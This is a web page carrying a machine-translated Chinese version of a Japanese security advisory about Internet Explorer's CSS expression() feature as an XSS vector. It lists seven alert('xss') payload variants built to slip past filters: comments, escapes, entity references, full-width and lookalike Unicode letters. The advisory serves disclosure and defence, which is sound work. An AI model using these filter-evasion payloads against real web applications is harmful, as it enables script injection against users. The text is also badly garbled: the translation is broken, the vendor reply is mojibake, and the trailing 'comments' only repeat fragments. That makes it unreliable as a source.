目录介绍:
日文翻译大师请进!
(可能不太准确我是用软件翻译的)
概要:
Internet Explorer(以下IE) 那么是"expression(算式)因为说",并且包括述所以能在JavaScript在样式座席里述する。但是因为这个expression这个的?的検出范囲广阔所以JavaScript被在超过Web应用程序开発者的估计的范囲执行,并且,在IE,有成为XSS的事的原因。为此,Web应用程序开発者必须密切注意检查样式席。
确认被玩了的版本:
Internet Explorer 6
Internet Explorer 7 RC1
详细:
在IE,能让因为用如下样式述する所以在JavaScript做收成。
1) 在style块中的定?
styleinput { left:expression( alert('xss') ) } /style
2) 在界内系统的样式定?
div style="{ left:expression( alert('xss') ) }"
3) 评语的插入
div style="{ left:exp/* */ression( alert('xss') ) }"
4) 在反斜线的电码点数指定
div style="{ left:/0065/0078pression( alert('xss') ) }"
5) 本质参照
在界内系统的样式定能那么利用本质参照。
div style="{ left:expression( alert('xss') ) }"
6) 全角文字
div style="{ left:expression( alert('xss') ) }"
7) 特定的Unicode文字
div style="{ left:expRessioN( alert('xss') ) }"
至于R,U+0280,N能利用U+0274或者U+207F。
上边||1)? ? 7) 让は互相看,表面能做。
另外,||6) 叫7) 在は,IE7 RC1,不做收成。
被假定,并且是威:
攻击者自己在Web邮件以及样式席的指定可能的blog决定插入好象作为上?的样式,并且钻过想要查出"expression"的XSS防御的过滤器,并且变得能脱落。
経:
本案不是直接IE的脆弱性,但是在XSS因する的安全上边的||和点数判断,并且仁慈根据安全早期小心地合股指导,并且在通过IPA作为开発者的微软拿??了,并且得到了以下的评语。
--
确在弊社开発部做了||果,本现象||在点数的Internet Explorer的式样上边的||是收成,并且当不正确的时候被脆弱判断了。
为此,必要有??被收成书在Web网站上发生,并且〓エヒ,アリメェモミ??アサハユウノハ鰆レ」ラ」萤篑蒦セノマキ「ノ〓イ「ヌメ紊乱リ在合进行在网站?的过虑。
--
制品开発者が脆弱性ではないと明言していること、実际にこのデザインを原因とするXSSが存在するWebアプリケーションを复数确认したこと、「适切なフィルタリング」のためにはWebアプリケーション开発者への広い通知が必要なことから、本问题を公开するべきだと判断しました。
网友评论
最新评论
ーションを复数确认したこと、「适切なフィルタリング」のためにはWebアプリケーション开発者への広い通知が必要なことから、本问题を公开するべきだと判断しました。
) }" 5) 本质参照 在界内系统的样式定能那么利用本质参照。 div style="{ left:expression( alert('xss') ) }" 6) 全角文字 div style="{ left:expressi